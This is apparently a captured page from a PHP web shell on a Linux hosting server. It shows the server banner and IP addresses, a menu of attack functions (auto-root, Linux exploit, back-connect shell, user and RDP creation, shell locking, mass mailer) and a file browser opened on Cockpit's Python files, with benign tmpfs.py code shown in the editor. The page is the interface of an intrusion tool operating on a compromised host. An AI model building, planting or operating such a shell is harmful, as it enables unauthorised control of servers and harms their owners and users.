Linux salto.nuvemidc.com 5.14.0-687.42.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Aug 27 11:55:12 EDT 2026 x86_64
LiteSpeed
: 177.73.233.61 | : 216.73.217.116
Cant Read [ /etc/named.conf ]
7.4.33
agenci18
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
lib /
python3.9 /
site-packages /
cockpit /
_vendor /
bei /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
data
[ DIR ]
drwxr-xr-x
__init__.py
0
B
-rw-r--r--
beiboot.py
5.04
KB
-rw-r--r--
beipack.py
7.2
KB
-rw-r--r--
bootloader.py
3.48
KB
-rw-r--r--
spawn.py
971
B
-rw-r--r--
tmpfs.py
563
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tmpfs.py
import os import subprocess import sys import tempfile def main(*command: str) -> None: with tempfile.TemporaryDirectory() as tmpdir: os.chdir(tmpdir) for key, value in __loader__.get_contents().items(): if key.startswith('tmpfs/'): subdir = os.path.dirname(key) os.makedirs(subdir, exist_ok=True) with open(key, 'wb') as fp: fp.write(value) os.chdir('tmpfs') result = subprocess.run(command, check=False) sys.exit(result.returncode)
Close